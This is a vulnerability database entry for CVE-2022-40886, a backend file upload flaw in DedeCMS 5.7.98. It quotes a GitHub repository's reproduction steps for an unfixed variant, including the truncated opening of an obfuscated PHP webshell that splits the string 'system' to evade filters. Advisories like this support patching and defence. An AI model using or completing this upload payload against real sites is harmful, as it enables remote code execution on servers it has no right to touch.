Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.2
CVSSv3

CVE-2022-40886

Published: 03/10/2022 Updated: 04/10/2022
CVSS v3 Base Score: 7.2 | Impact Score: 5.9 | Exploitability Score: 1.2
VMScore: 0
Subscribe to Dedecms

Vulnerability Summary

DedeCMS 5.7.98 has a file upload vulnerability in the background.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

dedecms dedecms 5.7.98

Github Repositories

https://github.com/linchuzhu/Dedecms-v5.7.101-RCE

Dedecms-v57101-RCE Vulnerability Description Since CVE-2022-40886 is not fully fixed, Dedecms still has a file upload vulnerability, leading to RCE Vulnerability to reproduce Log in to the backend of the website Upload the file hhhphp, the content of the file is as follows: <?php $x='sys';$xx='tem';$xxx=$x$xx;$y='di';$yy='r'

References

CWE-434https://github.com/Ephemeral1y/Vulnerability/blob/master/DedeCMS/5.7.98/DedeCMS-v5.7.98-RCE.mdhttps://nvd.nist.govhttps://github.com/linchuzhu/Dedecms-v5.7.101-RCE
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2023-49333CVE-2024-33901CVE-2024-36001CVE-2024-2835firewallXPath injectionauthentication bypassCVE-2024-22120CVE-2024-32002
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook